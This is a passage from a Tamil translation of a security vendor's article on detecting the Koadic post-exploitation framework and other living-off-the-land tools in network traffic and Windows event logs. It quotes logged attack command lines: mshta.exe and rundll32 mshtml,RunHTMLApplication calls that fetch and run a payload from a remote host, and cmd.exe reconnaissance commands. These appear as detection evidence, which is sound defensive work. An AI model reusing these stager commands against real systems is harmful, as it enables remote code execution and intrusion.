குறியீட்டைச் செயல்படுத்த, பழக்கமான WS பண்புக்கூறுடன் கூடிய GAWTUUGCFI மாறி தேவை. அதன் உதவியுடன், உள்வைப்பு ஷெல்லை அழைக்கிறது, குறியீட்டின் இரண்டு கிளைகளை செயலாக்குகிறது - shell.exec வெளியீடு தரவு ஸ்ட்ரீம் மற்றும் ஷெல்.ரன் திரும்பாமல் திரும்பும்.

Koadic ஒரு பொதுவான கருவி அல்ல, ஆனால் அது அதன் சொந்த கலைப்பொருட்களைக் கொண்டுள்ளது, இதன் மூலம் இது முறையான போக்குவரத்தில் காணப்படுகிறது:

  • HTTP கோரிக்கைகளின் சிறப்பு உருவாக்கம்,
  • winHttpRequests API ஐப் பயன்படுத்துதல்,
  • ActiveXObject வழியாக WScript.Shell பொருளை உருவாக்குதல்,
  • பெரிய இயங்கக்கூடிய உடல்.

ஆரம்ப இணைப்பு ஸ்டேஜரால் தொடங்கப்படுகிறது, எனவே விண்டோஸ் நிகழ்வுகள் மூலம் அதன் செயல்பாட்டைக் கண்டறிய முடியும். mshta க்கு, இது நிகழ்வு 4688 ஆகும், இது தொடக்க பண்புடன் ஒரு செயல்முறையை உருவாக்குவதைக் குறிக்கிறது:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Koadic இயங்கும் போது, ​​நீங்கள் மற்ற 4688 நிகழ்வுகளைக் காணலாம்.

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

கண்டுபிடிப்புகள்

நிலத்தை நம்பி வாழ்வது குற்றவாளிகள் மத்தியில் பிரபலமடைந்து வருகிறது. அவர்கள் தங்கள் தேவைகளுக்காக விண்டோஸில் கட்டமைக்கப்பட்ட கருவிகள் மற்றும் வழிமுறைகளைப் பயன்படுத்துகின்றனர். இந்தக் கொள்கையைப் பின்பற்றும் பிரபலமான கருவிகளான Koadic, CrackMapExec மற்றும் Impacket ஆகியவை APT அறிக்கைகளில் அதிகளவில் தோன்றுவதைப் பார்க்கிறோம். இந்த கருவிகளுக்கான கிட்ஹப்பில் உள்ள ஃபோர்க்குகளின் எண்ணிக்கையும் அதிகரித்து வருகிறது, மேலும் புதியவை தோன்றுகின்றன (அவற்றில் ஏற்கனவே ஆயிரம் உள்ளன). இந்த போக்கு அதன் எளிமை காரணமாக பிரபலமடைந்து வருகிறது: தாக்குபவர்களுக்கு மூன்றாம் தரப்பு கருவிகள் தேவையில்லை; அவர்கள் ஏற்கனவே பாதிக்கப்பட்டவர்களின் இயந்திரங்களில் உள்ளனர் மற்றும் பாதுகாப்பு நடவடிக்கைகளை புறக்கணிக்க உதவுகிறார்கள். நெட்வொர்க் தகவல்தொடர்புகளைப் படிப்பதில் நாங்கள் கவனம் செலுத்துகிறோம்: மேலே விவரிக்கப்பட்ட ஒவ்வொரு கருவியும் பிணைய போக்குவரத்தில் அதன் சொந்த தடயங்களை விட்டுச்செல்கிறது; அவற்றைப் பற்றிய விரிவான ஆய்வு எங்கள் தயாரிப்புகளை கற்பிக்க அனுமதித்தது PT நெட்வொர்க் தாக்குதல் கண்டுபிடிப்பு அவற்றைக் கண்டறிந்து, இறுதியில் அவர்கள் சம்பந்தப்பட்ட இணையச் சம்பவங்களின் முழு சங்கிலியையும் விசாரிக்க உதவுகிறது.

ஆசிரியர்கள்:

  • Anton Tyurin, நிபுணர் சேவைகள் துறை தலைவர், PT நிபுணர் பாதுகாப்பு மையம், நேர்மறை தொழில்நுட்பங்கள்
  • Egor Podmokov, நிபுணர், PT நிபுணர் பாதுகாப்பு மையம், நேர்மறை தொழில்நுட்பங்கள்

ஆதாரம்: www.habr.com

கருத்தைச் சேர்